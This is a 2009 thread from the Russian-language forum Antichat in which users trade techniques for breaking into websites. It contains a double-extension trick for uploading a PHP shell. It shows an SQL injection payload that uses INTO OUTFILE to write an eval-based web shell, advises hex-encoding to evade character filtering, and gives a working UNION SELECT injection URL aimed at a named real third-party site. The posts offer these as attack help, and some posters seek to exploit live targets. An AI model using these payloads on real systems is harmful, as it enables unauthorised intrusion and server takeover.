ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.04.2009, 13:54
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Как можно попробовать залить ПХП шелл если проходят файлы только с расширение gif и jpg?
И возможно ли через SQL-inj залить фаил?
Последний раз редактировалось Byrger; 10.04.2009 в 14:08..
|
|
|
10.04.2009, 14:43
|
|
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
Провел на форуме:
2816163
Репутация:
158
|
|
Попробуй расширение shell.jpg.php или в кртинку вставить код
Записать можно если есть права на запись, проблема в том что нужно знать поный путь куда доступна запись..
https://forum.antichat.ru/thread43966.html
2.2.1 Запись в файл
Есть в MYSQL такая интересная функция типа SELECT … INTO OUTFILE позволяющая записывать информацию в файл. Либо такая конструкция SELECT ... INTO DUMPFILE они почти похоже и можно использовать любую.
Пример: http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt'; --
Для нее работает несколько ограничений.
Запрещенно перезаписывание файлов
Требуются привилегии типа FILE
(!)Обязательны настоящие кывычки в указании имени файла
А вот что бы нам мешало сделать веб шел? Вот например так:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php'; --
Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php. Врипринципе можно найти еще одну ошибку по отчету которой будет виден путь на сервере или оставить в корне сервера и подцепить его локальным инклудом, но это уже другая тема.
|
|
|
|
10.04.2009, 14:52
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от fker
Попробуй расширение shell.jpg.php или в кртинку вставить код
Записать можно если есть права на запись, проблема в том что нужно знать поный путь куда доступна
.......
можно найти еще одну ошибку по отчету которой будет виден путь на сервере или оставить в корне сервера и подцепить его локальным инклудом, но это уже другая тема.
<> () заменяюся на спец символы...
Полный путь я знаю...
А PHP шелл не заливался так-как туда вообще ничего не заливается 
|
|
|
|
10.04.2009, 15:30
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от Byrger
<> () заменяюся на спец символы...
Полный путь я знаю...
А PHP шелл не заливался так-как туда вообще ничего не заливается Ну режутся, это впринципе не трабла, подставь в хексе... и вообще скулю в студию, посмотреть бы на неё, на пальцах гадать как то не очень...
|
|
|
|
10.04.2009, 15:38
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от DrAssault
Ну режутся, это впринципе не трабла, подставь в хексе... и вообще скулю в студию, посмотреть бы на неё, на пальцах гадать как то не очень...
Да ты что?Как ты хексе то подставишь?...как подставишь в кесе так он и запишит в хексе..
|
|
|
|
10.04.2009, 15:41
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Имею страницу:
site.ru/magazine/tapki.html
Если подставить /tapki'.html - то вылазиет
Код:
Warning: Wrong parameter count for mysql_result() in D:\host\magazine\index.php on line 26
Если подставить просто /tapki' то ничего неслучиться,идет проверка на расширение 
Так вот,возможноли раскрутить? Так ака это мой первый опыт проведения SQL-inj то пожалуйста поподробнее.ЗАрание спасибо. |
|
|
|
10.04.2009, 15:51
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от DimOnOID
Да ты что?Как ты хексе то подставишь?...как подставишь в кесе так он и запишит в хексе..
Сообщение от m0Hze
Имею страницу:
site.ru/magazine/tapki.html
Если подставить /tapki'.html - то вылазиет
Код:
Warning: Wrong parameter count for mysql_result() in D:\host\magazine\index.php on line 26
Если подставить просто /tapki' то ничего неслучиться,идет проверка на расширение
Так вот,возможноли раскрутить? Так ака это мой первый опыт проведения SQL-inj то пожалуйста поподробнее.ЗАрание спасибо. Можно конечно, крутится как обычная скуля, вот пример тебе:
Код:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),database(),version()),25,26,27,28,29,30,31,32,33,34.html
Источник: http://www.karabas.info/
Последний раз редактировалось DrAssault; 10.04.2009 в 15:55..
|
|
|
|
10.04.2009, 15:58
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от DrAssault
Не надо кричать!!! Тебе пример привести чтоли??? Я не говорю про пути!!! Где ты в пути видел знаки () и <> у???
Можно конечно, крутится как обычная скуля, вот пример тебе:
Код:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),database(),version()),25,26,27,28,29,30,31,32,33,34.html
Источник: http://www.karabas.info/
GПопобывал прямо твой пример - эфекта ноль,но я так понимаю это изза количества столбцов
Где можно почитать хороший,доступный ман по этому делу..?
|
|
|
|
10.04.2009, 16:00
|
|
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
Провел на форуме:
2144019
Репутация:
214
|
|
Можно ли узнать пасс от phpMyAdmin 2.9.2 ?
|
|
|
|
10.04.2009, 16:01
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
m0Hze, там уже прикрыли скулю...
http://forum.antichat.ru/thread43966.html - читай
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
